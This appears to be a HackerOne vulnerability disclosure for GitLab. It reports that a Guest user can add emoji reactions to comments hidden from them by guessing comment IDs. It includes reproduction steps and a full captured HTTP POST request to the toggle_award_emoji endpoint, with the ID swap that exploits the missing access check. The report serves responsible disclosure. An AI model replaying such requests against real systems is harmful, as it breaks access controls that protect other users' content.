Skip to content

Guest can add reaction to comments which are not visible to them

Link:          https://hackerone.com/reports/407425
By:            @ashish_r_padelkar

Details: Summary:

Hello,

A user with Guest role in a group can not add reaction to any comments which are not visible to them in a group

Description: A Guest can not see comments when issue is confidential or comments from merge requests etc. However, if they can correctly guess the ID of the comments, they can send their reactions to it

Steps To Reproduce:

  1. As a Guest in a group, react to the any visible comment first and capture the below request
POST /Group1ww/NeNeW/notes/99856777/toggle_award_emoji HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 21
Accept: application/json, text/plain, */*
Origin: https://gitlab.com
X-CSRF-Token: +6Q9xzAdYpP76jsCu3QExYbNboI/5NT/siQVoIRa8oO5ecpAY6miy1m6R4zLGuIlc68fqMGCmk6rn+BGGlw8ig==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://gitlab.com/Group1ww/NeNeW/issues/1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1

{"name":"basketball"}
  1. Where 99856777 is the ID of the comment. Replace this ID in above request with comment ID of comment which is not visible to you in a group and send the request

POST /Group1ww/NeNeW/notes/<CommentID>/toggle_award_emoji HTTP/1.1

  1. When users with access to such comments will see that Guest has reacted to the comments which is not possible otherwise!

Regards, Ashish

Impact

Guest can react to the comments which are not visible to them in a group